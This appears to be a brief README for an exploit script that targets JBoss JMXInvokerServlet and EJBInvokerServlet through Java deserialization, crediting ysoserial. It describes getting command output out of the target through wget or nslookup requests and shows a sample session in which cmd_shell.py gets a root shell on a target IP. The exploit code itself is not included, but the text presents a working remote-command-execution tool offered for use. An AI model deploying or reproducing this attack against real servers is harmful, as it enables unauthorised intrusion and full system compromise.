JMXInvokerServlet-EJBInvokerServlet serialized objects command execution
full credit and details at the following link:
https://github.com/frohoff/ysoserial
this script lets you execute and retrieve commands output (through wget or nslookup requests) from a vulnerable target like in a shell.
root@kali:~/script/InvokerServlet-exec/wget# python cmd_shell.py 192.168.1.20
$> id
uid=0(root) gid=0(root) groups=0(root)
$> exit
Bye!